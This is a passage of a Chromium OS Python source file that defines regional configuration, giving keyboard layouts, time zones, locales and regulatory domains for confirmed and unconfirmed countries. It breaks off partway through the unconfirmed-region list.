+{"seq_id":"610417889","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n# Copyright 2015 The Chromium OS Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Authoritative source for Chromium OS region/locale configuration.\n\nRun this module to display all known regions (use --help to see options).\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport collections\nimport json\nimport re\nimport sys\n\nimport yaml\n\n\n# The regular expression to check values in Region.keyboards and Region.locales.\n# Keyboards should come with xkb: protocol, or the input methods (ime:, m17n:).\n# Examples: xkb:us:intl:eng, ime:ime:zh-t:cangjie, xkb:us:altgr-intl:eng\nKEYBOARD_PATTERN = re.compile(r'^xkb:\\w+:[\\w-]*:\\w+$|'\n r'^(ime|m17n|t13n):[\\w:-]+$')\n# Locale should be a combination of language and location.\n# Examples: en-US, ja.\nLOCALE_PATTERN = re.compile(r'^(\\w+)(-[A-Z0-9]+)?$')\n\n\nclass Enum(frozenset):\n \"\"\"An enumeration type.\n\n Usage:\n To create a enum object:\n dummy_enum = Enum(['A', 'B', 'C'])\n\n To access a enum object, use:\n dummy_enum.A\n dummy_enum.B\n \"\"\"\n\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\n\nclass RegionException(Exception):\n \"\"\"Exception in Region handling.\"\"\"\n pass\n\n\ndef MakeList(value):\n \"\"\"Converts the given value to a list.\n\n Returns:\n A list of elements from \"value\" if it is iterable (except string);\n otherwise, a list contains only one element.\n \"\"\"\n if (isinstance(value, collections.Iterable) and\n not isinstance(value, basestring)):\n return list(value)\n return [value]\n\n\nclass Region(object):\n \"\"\"Comprehensive, standard locale configuration per country/region.\n\n See :ref:`regions-values` for detailed information on how to set these values.\n \"\"\"\n # pylint gets confused by some of the docstrings.\n # pylint: disable=C0322\n\n # ANSI = US-like\n # ISO = UK-like\n # JIS = Japanese\n # KS = Korean (see http://crosbug.com/p/50753 for why this is not used yet)\n # ABNT2 = Brazilian (like ISO but with an extra key to the left of the\n # right shift key)\n KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'KS', 'ABNT2'])\n\n region_code = None\n \"\"\"A unique identifier for the region. This may be a lower-case\n `ISO 3166-1 alpha-2 code\n `_ (e.g., ``us``),\n a variant within an alpha-2 entity (e.g., ``ca.fr``), or an\n identifier for a collection of countries or entities (e.g.,\n ``latam-es-419`` or ``nordic``). See :ref:`region-codes`.\n\n Note that ``uk`` is not a valid identifier; ``gb`` is used as it is\n the real alpha-2 code for the UK.\"\"\"\n\n keyboards = None\n \"\"\"A list of keyboard layout identifiers (e.g., ``xkb:us:intl:eng``\n or ``m17n:ar``). This field was designed to be the physical keyboard layout\n in the beginning, and then becomes a list of OOBE keyboard selection, which\n then includes non-physical layout elements like input methods (``ime:``).\n To avoid confusion, physical layout is now defined by\n :py:attr:`keyboard_mechanical_layout`, and this is reserved for logical\n layouts.\n\n This is identical to the legacy VPD ``keyboard_layout`` value.\"\"\"\n\n time_zones = None\n \"\"\"A list of default `tz database time zone\n `_\n identifiers (e.g., ``America/Los_Angeles``). See\n `timezone_settings.cc `_ for supported time\n zones.\n\n This is identical to the legacy VPD ``initial_timezone`` value.\"\"\"\n\n locales = None\n \"\"\"A list of default locale codes (e.g., ``en-US``); see\n `l10n_util.cc `_ for supported locales.\n\n This is identital to the legacy VPD ``initial_locale`` field.\"\"\"\n\n keyboard_mechanical_layout = None\n \"\"\"The keyboard's mechanical layout (``ANSI`` [US-like], ``ISO``\n [UK-like], ``JIS`` [Japanese], ``ABNT2`` [Brazilian] or ``KS`` [Korean]).\"\"\"\n\n description = None\n \"\"\"A human-readable description of the region.\n This defaults to :py:attr:`region_code` if not set.\"\"\"\n\n notes = None\n \"\"\"Implementation notes about the region. This may be None.\"\"\"\n\n regulatory_domain = None\n \"\"\"An ISO 3166-1 alpha 2 upper-cased two-letter region code for setting\n Wireless regulatory. See crosbug.com/p/38745 for more details.\n\n When omitted, this will derive from region_code.\"\"\"\n\n confirmed = None\n \"\"\"An optional boolean flag to indicate if the region data is confirmed.\"\"\"\n\n FIELDS = ['region_code', 'description', 'keyboards',\n 'time_zones', 'locales', 'keyboard_mechanical_layout',\n 'regulatory_domain']\n \"\"\"Names of fields that define the region.\"\"\"\n\n def __init__(self, region_code, keyboards, time_zones, locales,\n keyboard_mechanical_layout, description=None, notes=None,\n regdomain=None):\n \"\"\"Constructor.\n\n Args:\n region_code: See :py:attr:`region_code`.\n keyboards: See :py:attr:`keyboards`. A single string is accepted for\n backward compatibility.\n time_zones: See :py:attr:`time_zones`.\n locales: See :py:attr:`locales`. A single string is accepted\n for backward compatibility.\n keyboard_mechanical_layout: See :py:attr:`keyboard_mechanical_layout`.\n description: See :py:attr:`description`.\n notes: See :py:attr:`notes`.\n regdomain: See :py:attr:`regulatory_domain`.\n \"\"\"\n\n def regdomain_from_region(region):\n if region.find('.') >= 0:\n region = region[:region.index('.')]\n if len(region) == 2:\n return region.upper()\n return None\n\n # Quick check: should be 'gb', not 'uk'\n if region_code == 'uk':\n raise RegionException(\"'uk' is not a valid region code (use 'gb')\")\n\n self.region_code = region_code\n self.keyboards = MakeList(keyboards)\n self.time_zones = MakeList(time_zones)\n self.locales = MakeList(locales)\n self.keyboard_mechanical_layout = keyboard_mechanical_layout\n self.description = description or region_code\n self.notes = notes\n self.regulatory_domain = (regdomain or regdomain_from_region(region_code))\n self.confirmed = None\n\n for f in (self.keyboards, self.locales):\n assert all(isinstance(x, str) for x in f), (\n 'Expected a list of strings, not %r' % f)\n for f in self.keyboards:\n assert KEYBOARD_PATTERN.match(f), (\n 'Keyboard pattern %r does not match %r' % (\n f, KEYBOARD_PATTERN.pattern))\n for f in self.locales:\n assert LOCALE_PATTERN.match(f), (\n 'Locale %r does not match %r' % (\n f, LOCALE_PATTERN.pattern))\n assert (self.regulatory_domain and\n len(self.regulatory_domain) == 2 and\n self.regulatory_domain.upper() == self.regulatory_domain), (\n 'Regulatory domain settings error for region %s' % region_code)\n\n def __repr__(self):\n return 'Region(%s)' % (', '.join([getattr(self, x) for x in self.FIELDS]))\n\n def GetFieldsDict(self):\n \"\"\"Returns a dict of all substantive fields.\n\n notes and description are excluded.\n \"\"\"\n return dict((k, getattr(self, k)) for k in self.FIELDS)\n\nKML = Region.KeyboardMechanicalLayout\nREGIONS_LIST = [\n Region(\n 'au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', KML.ANSI,\n 'Australia'),\n Region(\n 'be', 'xkb:be::nld', 'Europe/Brussels', 'en-GB', KML.ISO,\n 'Belgium', (\n 'Flemish (Belgian Dutch) keyboard; British English language for '\n 'neutrality')),\n Region(\n 'br', 'xkb:br::por', 'America/Sao_Paulo', 'pt-BR', KML.ABNT2,\n 'Brazil (ABNT2)', (\n 'ABNT2 = ABNT NBR 10346 variant 2. This is the preferred layout '\n 'for Brazil. ABNT2 is mostly an ISO layout, but it 12 keys between '\n 'the shift keys; see http://goo.gl/twA5tq')),\n Region(\n 'br.abnt', 'xkb:br::por', 'America/Sao_Paulo', 'pt-BR', KML.ISO,\n 'Brazil (ABNT)', (\n 'Like ABNT2, but lacking the extra key to the left of the right '\n 'shift key found in that layout. ABNT2 (the \"br\" region) is '\n 'preferred to this layout')),\n Region(\n 'br.usintl', 'xkb:us:intl:eng', 'America/Sao_Paulo', 'pt-BR', KML.ANSI,\n 'Brazil (US Intl)', (\n 'Brazil with US International keyboard layout. ABNT2 (\"br\") and '\n 'ABNT1 (\"br.abnt1 \") are both preferred to this.')),\n Region(\n 'ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', KML.ANSI,\n 'Canada (US keyboard)', (\n 'Canada with US (ANSI) keyboard. Only allowed if there are '\n 'separate US English, Canadian English, and French SKUs. '\n 'Not for en/fr hybrid ANSI keyboards; for that you would want '\n 'ca.hybridansi. See http://goto/cros-canada')),\n Region(\n 'ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', KML.ISO,\n 'Canada (French keyboard)', (\n 'Canadian French (ISO) keyboard. The most common configuration for '\n 'Canadian French SKUs. See http://goto/cros-canada')),\n Region(\n 'ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', KML.ISO,\n 'Canada (hybrid ISO)', (\n 'Canada with hybrid (ISO) xkb:ca:eng:eng + xkb:ca::fra keyboard, '\n 'defaulting to English language and keyboard. Used only if there '\n 'needs to be a single SKU for all of Canada. See '\n 'http://goto/cros-canada')),\n Region(\n 'ca.hybridansi', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', KML.ANSI,\n 'Canada (hybrid ANSI)', (\n 'Canada with hybrid (ANSI) xkb:ca:eng:eng + xkb:ca::fra keyboard, '\n 'defaulting to English language and keyboard. Used only if there '\n 'needs to be a single SKU for all of Canada. See '\n 'http://goto/cros-canada')),\n Region(\n 'ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA', KML.ISO,\n 'Canada (multilingual)', (\n \"Canadian Multilingual keyboard; you probably don't want this. See \"\n 'http://goto/cros-canada')),\n Region(\n 'ch', 'xkb:ch::ger', 'Europe/Zurich', 'de-CH', KML.ISO,\n 'Switzerland', (\n 'German keyboard')),\n Region(\n 'de', 'xkb:de::ger', 'Europe/Berlin', 'de', KML.ISO,\n 'Germany'),\n Region(\n 'es', 'xkb:es::spa', 'Europe/Madrid', 'es', KML.ISO,\n 'Spain'),\n Region(\n 'fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', KML.ISO,\n 'Finland'),\n Region(\n 'fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', KML.ISO,\n 'France'),\n Region(\n 'gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', KML.ISO,\n 'UK'),\n Region(\n 'ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', KML.ISO,\n 'Ireland'),\n Region(\n 'in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', KML.ANSI,\n 'India'),\n Region(\n 'it', 'xkb:it::ita', 'Europe/Rome', 'it', KML.ISO,\n 'Italy'),\n Region(\n 'latam-es-419', 'xkb:es::spa', 'America/Mexico_City', 'es-419', KML.ISO,\n 'Hispanophone Latin America', (\n 'Spanish-speaking countries in Latin America, using the Iberian '\n '(Spain) Spanish keyboard, which is increasingly dominant in '\n 'Latin America. Known to be correct for '\n 'Chile, Colombia, Mexico, Peru; '\n 'still unconfirmed for other es-419 countries. The old Latin '\n 'American layout (xkb:latam::spa) has not been approved; before '\n 'using that you must seek review through http://goto/vpdsettings. '\n 'See also http://goo.gl/Iffuqh. Note that 419 is the UN M.49 '\n 'region code for Latin America'), 'MX'),\n Region(\n 'my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', KML.ANSI,\n 'Malaysia'),\n Region(\n 'nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', KML.ANSI,\n 'Netherlands'),\n Region(\n 'nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', KML.ISO,\n 'Nordics', (\n 'Unified SKU for Sweden, Norway, and Denmark. This defaults '\n 'to Swedish keyboard layout, but starts with US English language '\n 'for neutrality. Use if there is a single combined SKU for Nordic '\n 'countries.'), 'SE'),\n Region(\n 'nz', 'xkb:us::eng', 'Pacific/Auckland', 'en-NZ', KML.ANSI,\n 'New Zealand'),\n Region(\n 'ph', 'xkb:us::eng', 'Asia/Manila', 'en-US', KML.ANSI,\n 'Philippines'),\n Region(\n 'ru', ['xkb:us::eng', 'xkb:ru::rus'], 'Europe/Moscow', 'ru', KML.ANSI,\n 'Russia', (\n 'For R31+ only; R30 and earlier must use US keyboard for login')),\n Region(\n 'se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', KML.ISO,\n 'Sweden', (\n 'Use this if there separate SKUs for Nordic countries (Sweden, '\n 'Norway, and Denmark), or the device is only shipping to Sweden. '\n \"If there is a single unified SKU, use 'nordic' instead.\")),\n Region(\n 'sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', KML.ANSI,\n 'Singapore'),\n Region(\n 'us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', KML.ANSI,\n 'United States'),\n Region(\n 'jp', ['xkb:jp::jpn', 'ime:jp:mozc_jp'], 'Asia/Tokyo', 'ja', KML.JIS,\n 'Japan'),\n Region(\n 'za', 'xkb:gb:extd:eng', 'Africa/Johannesburg', 'en-ZA', KML.ISO,\n 'South Africa'),\n Region(\n 'ng', 'xkb:us:intl:eng', 'Africa/Lagos', 'en-GB', KML.ANSI,\n 'Nigeria'),\n Region(\n 'hk', ['xkb:us::eng', 'ime:zh-t:cangjie', 'ime:zh-t:quick',\n 'ime:zh-t:array', 'ime:zh-t:dayi', 'ime:zh-t:zhuyin',\n 'ime:zh-t:pinyin'], 'Asia/Hong_Kong', ['zh-TW', 'en-GB',\n 'zh-CN'], KML.ANSI,\n 'Hong Kong'),\n Region(\n 'gcc', ['xkb:us::eng', 'm17n:ar', 't13n:ar'], 'Asia/Riyadh', [\n 'ar', 'en-GB'],\n KML.ANSI,\n 'Gulf Cooperation Council (GCC)', (\n 'GCC is a regional intergovernmental political and economic '\n 'union consisting of all Arab states of the Persian Gulf except '\n 'for Iraq. Its member states are the Islamic monarchies of '\n 'Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and the United Arab '\n 'Emirates.'), 'SA'),\n Region(\n 'cz', ['xkb:cz::cze', 'xkb:cz:qwerty:cze'], 'Europe/Prague', [\n 'cs', 'en-GB'], KML.ISO,\n 'Czech Republic'),\n Region(\n 'th', ['xkb:us::eng', 'm17n:th', 'm17n:th_pattajoti',\n 'm17n:th_tis'], 'Asia/Bangkok', ['th', 'en-GB'], KML.ANSI,\n 'Thailand'),\n Region(\n 'id', 'xkb:us::ind', 'Asia/Jakarta', ['id', 'en-GB'], KML.ANSI,\n 'Indonesia'),\n Region(\n 'tw', ['xkb:us::eng', 'ime:zh-t:zhuyin', 'ime:zh-t:array',\n 'ime:zh-t:dayi', 'ime:zh-t:cangjie', 'ime:zh-t:quick',\n 'ime:zh-t:pinyin'], 'Asia/Taipei', ['zh-TW', 'en-US'], KML.ANSI,\n 'Taiwan'),\n Region(\n 'pl', 'xkb:pl::pol', 'Europe/Warsaw', ['pl', 'en-GB'], KML.ANSI,\n 'Poland'),\n Region(\n 'gr', ['xkb:us::eng', 'xkb:gr::gre', 't13n:el'], 'Europe/Athens', [\n 'el', 'en-GB'], KML.ANSI,\n 'Greece'),\n Region(\n 'il', ['xkb:us::eng', 'xkb:il::heb', 't13n:he'], 'Asia/Jerusalem', [\n 'he', 'en-US', 'ar'], KML.ANSI,\n 'Israel'),\n Region(\n 'pt', 'xkb:pt::por', 'Europe/Lisbon', ['pt-PT', 'en-GB'], KML.ISO,\n 'Portugal'),\n Region(\n 'ro', ['xkb:us::eng', 'xkb:ro::rum'], 'Europe/Bucharest', [\n 'ro', 'hu', 'de', 'en-GB'], KML.ISO,\n 'Romania'),\n Region(\n 'kr', ['xkb:us::eng', 'ime:ko:hangul'], 'Asia/Seoul', [\n 'ko', 'en-US'], KML.ANSI,\n 'South Korea'),\n Region(\n 'ae', 'xkb:us::eng', 'Asia/Dubai', 'ar', KML.ANSI,\n 'UAE'),\n Region(\n 'za.us', 'xkb:us::eng', 'Africa/Johannesburg', 'en-ZA', KML.ANSI,\n 'South Africa'),\n Region(\n 'vn', ['xkb:us::eng', 'm17n:vi_telex', 'm17n:vi_vni', 'm17n:vi_viqr',\n 'm17n:vi_tcvn'], 'Asia/Ho_Chi_Minh', ['vi', 'en-GB', 'en-US',\n 'fr', 'zh-TW'], KML.ANSI,\n 'Vietnam'),\n Region(\n 'at', ['xkb:de::ger', 'xkb:de:neo:ger'], 'Europe/Vienna', [\n 'de', 'en-GB'], KML.ISO,\n 'Austria'),\n Region(\n 'sk', ['xkb:us::eng', 'xkb:sk::slo'], 'Europe/Bratislava', [\n 'sk', 'hu', 'cs', 'en-GB'], KML.ISO,\n 'Slovakia'),\n Region(\n 'ch.usintl', 'xkb:us:intl:eng', 'Europe/Zurich', 'en-US', KML.ANSI,\n 'Switzerland (US Intl)', (\n 'Switzerland with US International keyboard layout.')),\n Region(\n 'pe', 'xkb:latam::spa', 'America/Lima', 'es-419', KML.ANSI,\n 'Peru'),\n Region(\n 'sa', 'xkb:us::eng', 'Asia/Riyadh', ['ar', 'en'], KML.ANSI,\n 'Saudi Arabia'),\n Region(\n 'mx', 'xkb:latam::spa', 'America/Mexico_City', 'es-MX', KML.ANSI,\n 'Mexico'),\n Region(\n 'cl', 'xkb:latam::spa', 'America/Santiago', 'es-419', KML.ANSI,\n 'Chile'),\n Region(\n 'kw', ['xkb:us::eng', 'm17n:ar', 't13n:ar'], 'Asia/Kuwait', [\n 'ar', 'en'], KML.ANSI,\n 'Kuwait'),\n Region(\n 'uy', 'xkb:latam::spa', 'America/Montevideo', 'es-419', KML.ANSI,\n 'Uruguay'),\n Region(\n 'tr', ['xkb:tr::tur', 'xkb:tr:f:tur'], 'Europe/Istanbul', [\n 'tr', 'en-GB'], KML.ISO,\n 'Turkey'),\n Region(\n 'ar', 'xkb:latam::spa', 'America/Argentina/Buenos_Aires', [\n 'es-AR', ], KML.ISO,\n 'Argentina'),\n Region(\n 'gb.usext', 'xkb:us:altgr-intl:eng', 'Europe/London', 'en-GB', KML.ISO,\n 'UK (US extended keyboard)', (\n 'GB with US extended keyboard')),\n Region(\n 'bg', ['xkb:bg::bul', 'xkb:bg:phonetic:bul'], 'Europe/Sofia', [\n 'bg', 'tr', 'en-US'], KML.ANSI,\n 'Bulgaria'),\n Region(\n 'jp.us', ['xkb:us::eng', 'ime:jp:mozc_us'], 'Asia/Tokyo', 'ja',\n KML.ANSI, 'Japan with US keyboard'),\n Region(\n 'is', 'xkb:is::ice', 'Atlantic/Reykjavik', ['is', 'en-GB'], KML.ISO,\n 'Iceland'),\n Region(\n 'us.intl', 'xkb:us:intl:eng', 'America/Los_Angeles', 'en-US', KML.ANSI,\n 'US (English Intl)'),\n Region(\n 'co', 'xkb:latam::spa', 'America/Bogota', 'es-CO', KML.ANSI,\n 'Colombia'),\n ]\n\n\"\"\"A list of :py:class:`regions.Region` objects for\nall **confirmed** regions. A confirmed region is a region whose\nproperties are known to be correct and valid: all contents (locale / timezone /\nkeyboards) are supported by Chrome.\"\"\"\n\n\nUNCONFIRMED_REGIONS_LIST = [\n Region(\n 'bd', 'xkb:bd::ben', 'Asia/Dhaka', ['bn-BD', 'en'], KML.ANSI,\n 'Bangladesh'),\n Region(\n 'bf', 'xkb:bf::fra', 'Africa/Ouagadougou', 'fr-BF', KML.ANSI,\n 'Burkina Faso'),\n Region(\n 'ba', 'xkb:ba::bos', 'Europe/Sarajevo', 'bs', KML.ANSI,\n 'Bosnia and Herzegovina'),\n Region(\n 'bb', 'xkb:bb::eng', 'America/Barbados', 'en-BB', KML.ANSI,\n 'Barbados'),\n Region(\n 'wf', 'xkb:us::eng', 'Pacific/Wallis', ['wls', 'fud'], KML.ANSI,\n 'Wallis and Futuna'),\n Region(\n 'bl', 'xkb:bl::fra', 'America/St_Barthelemy', 'fr', KML.ANSI,\n 'Saint Barthelemy'),\n Region(\n 'bm', 'xkb:bm::eng', 'Atlantic/Bermuda', ['en-BM', 'pt'], KML.ANSI,\n 'Bermuda'),\n Region(\n 'bn', 'xkb:bn::msa', 'Asia/Brunei', ['ms-BN', 'en-BN'], KML.ANSI,\n 'Brunei'),\n Region(\n 'bo', 'xkb:latam::spa', 'America/La_Paz', ['es-419', 'qu'], KML.ANSI,\n 'Bolivia'),\n Region(\n 'bh', 'xkb:bh::ara', 'Asia/Bahrain', ['ar', 'en', 'fa', 'ru'], KML.ANSI,\n 'Bahrain'),\n Region(\n 'bi', 'xkb:bi::fra', 'Africa/Bujumbura', ['fr-BI', 'rn'], KML.ANSI,\n 'Burundi'),\n Region(\n 'bj', 'xkb:bj::fra', 'Africa/Porto-Novo', 'fr-BJ', KML.ANSI,\n 'Benin'),\n Region(\n 'bt', 'xkb:bt::dzo', 'Asia/Thimphu', 'dz', KML.ANSI,\n 'Bhutan'),\n Region(\n 'jm', 'xkb:jm::eng', 'America/Jamaica', 'en-JM', KML.ANSI,\n 'Jamaica'),\n Region(\n 'bw', 'xkb:bw::eng', 'Africa/Gaborone', ['en-BW', 'tn-BW'], KML.ANSI,\n 'Botswana'),\n Region(\n 'ws', 'xkb:ws::smo', 'Pacific/Apia', ['sm', 'en-WS'], KML.ANSI,\n 'Samoa'),\n Region(\n 'bq', 'xkb:bq::nld', 'America/Kralendijk', ['nl', 'en'], KML.ANSI,\n 'Bonaire, Saint Eustatius and Saba '),\n Region(\n 'bs', 'xkb:bs::eng', 'America/Nassau', 'en-BS', KML.ANSI,\n 'Bahamas'),\n Region(\n 'je', 'xkb:je::eng', 'Europe/Jersey', ['en', 'pt'], KML.ANSI,\n 'Jersey'),\n Region(\n 'by', 'xkb:by::bel', 'Europe/Minsk', ['be', 'ru'], KML.ANSI,\n 'Belarus'),\n Region(\n 'bz', 'xkb:bz::eng', 'America/Belize', ['en-BZ', 'es'], KML.ANSI,\n 'Belize'),\n Region(\n 'rw', 'xkb:rw::kin', 'Africa/Kigali', ['rw', 'en-RW'], KML.ANSI,\n 'Rwanda'),\n Region(\n 'rs', 'xkb:rs::srp', 'Europe/Belgrade', ['sr', 'hu', 'bs'], KML.ANSI,\n 'Serbia'),\n Region(\n 'tl', 'xkb:us::eng', 'Asia/Dili', ['tet', 'pt-TL', 'en'], KML.ANSI,\n 'East Timor'),\n Region(\n 're', 'xkb:re::fra', 'Indian/Reunion', 'fr-RE', KML.ANSI,\n 'Reunion'),\n Region(\n 'tm', 'xkb:tm::tuk', 'Asia/Ashgabat', ['tk', 'ru', 'uz'], KML.ANSI,\n 'Turkmenistan'),\n Region(\n 'tj', 'xkb:tj::tgk', 'Asia/Dushanbe', ['tg', 'ru'], KML.ANSI,\n 'Tajikistan'),\n Region(\n 'tk', 'xkb:us::eng', 'Pacific/Fakaofo', ['tkl', 'en-TK'], KML.ANSI,\n 'Tokelau'),\n Region(\n 'gw', 'xkb:gw::por', 'Africa/Bissau', ['pt-GW', 'pov'], KML.ANSI,\n 'Guinea-Bissau'),\n Region(\n 'gu', 'xkb:gu::eng', 'Pacific/Guam', ['en-GU', 'ch-GU'], KML.ANSI,\n 'Guam'),\n Region(\n 'gt', 'xkb:latam::spa', 'America/Guatemala', 'es-419', KML.ANSI,\n 'Guatemala'),\n Region(\n 'gs', 'xkb:gs::eng', 'Atlantic/South_Georgia', 'en', KML.ANSI,\n 'South Georgia and the South Sandwich Islands'),\n Region(\n 'gq', 'xkb:gq::spa', 'Africa/Malabo', ['es-419', 'fr'], KML.ANSI,\n 'Equatorial Guinea'),\n Region(\n 'gp', 'xkb:gp::fra', 'America/Guadeloupe', 'fr-GP', KML.ANSI,\n 'Guadeloupe'),\n Region(\n 'gy', 'xkb:gy::eng', 'America/Guyana', 'en-GY', KML.ANSI,\n 'Guyana'),\n Region(\n 'gg', 'xkb:gg::eng', 'Europe/Guernsey', ['en', 'fr'], KML.ANSI,\n 'Guernsey'),\n Region(\n 'gf', 'xkb:gf::fra', 'America/Cayenne', 'fr-GF', KML.ANSI,\n 'French Guiana'),\n Region(\n 'ge', 'xkb:ge::geo', 'Asia/Tbilisi', 'ka', KML.ANSI,\n 'Georgia'),\n Region(\n 'gd', 'xkb:gd::eng', 'America/Grenada', 'en-GD', KML.ANSI,\n 'Grenada'),\n Region(\n 'ga', 'xkb:ga::fra', 'Africa/Libreville', 'fr-GA', KML.ANSI,\n 'Gabon'),\n Region(\n 'sv', 'xkb:latam::spa', 'America/El_Salvador', 'es-419', KML.ANSI,\n 'El Salvador'),\n Region(\n 'gn', 'xkb:gn::fra', 'Africa/Conakry', 'fr-GN', KML.ANSI,\n 'Guinea'),\n Region(\n 'gm', 'xkb:gm::eng', 'Africa/Banjul', ['en-GM', 'mnk', 'wof'], KML.ANSI,\n 'Gambia'),\n Region(\n 'gl', 'xkb:gl::kal', ['America/Godthab', 'America/Danmarkshavn',\n 'America/Scoresbysund', 'America/Thule'], [\n 'kl', 'da-GL', 'en'], KML.ANSI,\n 'Greenland'),\n Region(\n 'gi', 'xkb:gi::eng', 'Europe/Gibraltar', ['en-GI', 'es'], KML.ANSI,\n 'Gibraltar'),\n Region(\n 'gh', 'xkb:gh::eng', 'Africa/Accra', ['en-GH', 'ak', 'ee'], KML.ANSI,\n 'Ghana'),\n Region(\n 'om', 'xkb:om::ara', 'Asia/Muscat', ['ar', 'en', 'bal'], KML.ANSI,\n 'Oman'),\n Region(\n 'tn', 'xkb:tn::ara', 'Africa/Tunis', ['ar', 'fr'], KML.ANSI,\n 'Tunisia'),\n Region(\n 'jo', 'xkb:jo::ara', 'Asia/Amman', ['ar', 'en'], KML.ANSI,\n 'Jordan'),\n Region(\n 'hn', 'xkb:latam::spa', 'America/Tegucigalpa', 'es-HN', KML.ANSI,\n 'Honduras'),\n Region(\n 'hr', 'xkb:hr::scr', 'Europe/Zagreb', ['hr', 'en-GB'], KML.ISO,\n 'Croatia'),\n Region(\n 'ht', 'xkb:ht::hat', 'America/Port-au-Prince', ['ht'], KML.ANSI,\n 'Haiti'),\n Region(\n 'hu', ['xkb:us::eng', 'xkb:hu::hun'], 'Europe/Budapest', [\n 'hu', 'en-GB'], KML.ISO,\n 'Hungary'),\n Region(\n 've', 'xkb:latam::spa', 'America/Caracas', 'es-419', KML.ANSI,\n 'Venezuela'),\n Region(\n 'pr', 'xkb:pr::eng', 'America/Puerto_Rico', ['en-PR'], KML.ANSI,\n 'Puerto Rico'),\n Region(\n 'ps', 'xkb:ps::ara', ['Asia/Gaza', 'Asia/Hebron'], 'ar', KML.ANSI,\n 'Palestinian Territory'),\n Region(\n 'pw', 'xkb:us::eng', 'Pacific/Palau', ['pau', 'sov', 'en-PW', 'tox',\n 'ja', 'fil', 'zh'], KML.ANSI,\n 'Palau'),\n Region(\n 'sj', 'xkb:sj::nor', 'Arctic/Longyearbyen', ['no', 'ru'], KML.ANSI,\n 'Svalbard and Jan Mayen'),\n Region(\n 'py', 'xkb:latam::spa', 'America/Asuncion', ['es-419', 'gn'], KML.ANSI,\n 'Paraguay'),\n Region(\n 'iq', 'xkb:iq::ara', 'Asia/Baghdad', ['ar', 'ku', 'hy'], KML.ANSI,\n 'Iraq'),\n Region(\n 'pa', 'xkb:latam::spa', 'America/Panama', ['es-419', 'en'], KML.ANSI,\n 'Panama'),\n Region(\n 'pf', 'xkb:pf::fra', ['Pacific/Tahiti', 'Pacific/Marquesas',\n 'Pacific/Gambier'], ['fr-PF', 'ty'], KML.ANSI,\n 'French Polynesia'),\n Region(\n 'pg', 'xkb:pg::eng', ['Pacific/Port_Moresby',\n 'Pacific/Bougainville'], ['en-PG', 'ho', 'meu',\n 'tpi'], KML.ANSI,\n 'Papua New Guinea'),\n Region(\n 'pk', 'xkb:pk::urd', 'Asia/Karachi', ['ur-PK', 'en-PK', 'pa', 'sd',\n 'ps', 'brh'], KML.ANSI,\n 'Pakistan'),\n Region(\n 'pn', 'xkb:pn::eng', 'Pacific/Pitcairn', 'en-PN', KML.ANSI,\n 'Pitcairn'),\n Region(\n 'pm', 'xkb:pm::fra', 'America/Miquelon', 'fr-PM', KML.ANSI,\n 'Saint Pierre and Miquelon'),\n Region(\n 'zm', 'xkb:zm::eng', 'Africa/Lusaka', ['en-ZM', 'bem', 'loz', 'lun',\n 'lue', 'ny', 'toi'], KML.ANSI,\n 'Zambia'),\n Region(\n 'eh', 'xkb:eh::ara', 'Africa/El_Aaiun', ['ar', 'mey'], KML.ANSI,\n 'Western Sahara'),\n Region(\n 'ee', 'xkb:ee::est', 'Europe/Tallinn', ['et', 'ru', 'en-GB'], KML.ISO,\n 'Estonia'),\n Region(\n 'eg', 'xkb:eg::ara', 'Africa/Cairo', ['ar', 'en', 'fr'],\n KML.ANSI, 'Egypt'),\n Region(\n 'ec', 'xkb:latam::spa', ['America/Guayaquil'], 'es-419', KML.ANSI,\n 'Ecuador'),\n Region(\n 'sb', 'xkb:sb::eng', 'Pacific/Guadalcanal', ['en-SB', 'tpi'], KML.ANSI,\n 'Solomon Islands'),\n Region(\n 'et', 'xkb:et::amh', 'Africa/Addis_Ababa', ['am', 'en-ET', 'om-ET',\n 'ti-ET'], KML.ANSI,\n 'Ethiopia'),\n Region(\n 'so', 'xkb:so::som', 'Africa/Mogadishu', ['so-SO', 'ar'], KML.ANSI,\n 'Somalia'),\n Region(\n 'zw', 'xkb:zw::eng', 'Africa/Harare', ['en-ZW', 'sn', 'nr'], KML.ANSI,\n 'Zimbabwe'),\n Region(\n 'er', 'xkb:er::aar', 'Africa/Asmara', ['aa-ER', 'ar', 'tig', 'kun',\n 'ti-ER'], KML.ANSI,\n 'Eritrea'),\n Region(\n 'me', 'xkb:me::srp', 'Europe/Podgorica', ['sr', 'hu', 'bs', 'sq', 'hr',\n 'rom'], KML.ANSI,\n 'Montenegro'),\n Region(\n 'md', 'xkb:md::ron', 'Europe/Chisinau', ['ro', 'ru', 'gag'], KML.ANSI,\n 'Moldova'),\n Region(\n 'mg', 'xkb:mg::fra', 'Indian/Antananarivo', ['fr-MG', 'mg'], KML.ANSI,\n 'Madagascar'),\n Region(\n 'mf', 'xkb:mf::fra', 'America/Marigot', 'fr', KML.ANSI, 'Saint Martin'),\n Region(\n 'ma', 'xkb:ma::ara', 'Africa/Casablanca', ['ar', 'fr'], KML.ANSI,\n 'Morocco'),\n Region(\n 'mc', 'xkb:mc::fra', 'Europe/Monaco', ['fr-MC', 'en', 'it'], KML.ANSI,\n 'Monaco'),\n Region(\n 'uz', 'xkb:uz::uzb', 